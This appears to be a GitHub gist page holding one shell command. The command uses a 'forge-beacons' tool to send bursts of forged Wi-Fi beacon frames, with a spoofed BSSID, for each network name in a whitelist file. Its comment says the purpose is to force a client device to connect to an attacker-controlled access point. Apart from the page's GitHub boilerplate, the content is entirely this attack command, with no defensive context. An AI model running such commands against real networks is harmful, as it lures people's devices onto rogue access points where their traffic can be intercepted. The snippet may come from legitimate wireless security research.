Created
November 4, 2019 06:20
-
-
Save s0lst1c3/6703132b98a28e228b644c273a7e7f07 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# transmit burst of 5 forged beacon packets for each entry in our whitelist to force client device to connect | |
./forge-beacons -i wlan1 \ | |
--bssid de:ad:be:ef:13:37 \ | |
--known-essids-file ssid-whitelist.txt \ | |
--dst-addr 11:22:33:11:22:33 \ | |
--burst-count 5 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment